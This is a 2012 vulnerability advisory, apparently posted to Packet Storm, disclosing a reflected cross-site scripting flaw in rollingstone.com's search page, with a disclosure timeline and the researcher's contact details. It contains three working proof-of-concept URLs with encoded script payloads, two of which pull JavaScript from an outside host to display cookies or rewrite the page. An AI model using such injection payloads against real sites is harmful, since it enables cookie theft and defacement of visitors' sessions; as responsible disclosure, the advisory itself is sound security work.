Rollingstone.com suffers from a cross site scripting vulnerability. As of 12/23/2012, the author noted to Packet Storm that Rolling Stone has addressed the issue.
ccc58a651ef83f70fa9a186c7a2e6ef83c0652b758b8f4e789afe50c63a45c66
----------------------------------------------------------------------------------------------------
Title : Rollingstone.com reflected Cross Site Scripting (XSS) vulnerability
Vendor : Wenner Media (http://www.jannswenner.com/)
Description : Rollingstone.com web-site is vulnerable to reflected Cross-site Scripting attacks
Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor notified : 26-30 October and 6-8 November - no responses
- Packet Storm advisory : 15-Nov-2012
Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser
Details
----------------------------------------------------------------------------------------------------
Affected functionality: site search
Test #1: Remote Javascript execution: display browser cookie
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&x=0&y=0
Test #2, Remote Javascript execution: overwrite HTML content
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2FSCRIPT%3E&x=0&y=0
Test #3, Simple alert
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT%3Eprompt%28%2FXSS%2F%29%3C%2FSCRIPT%3E
Note: the test cases are not malicious.
Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Project site: http://idash.net
Twitter: https://twitter.com/JanneFI
----------------------------------------------------------------------------------------------------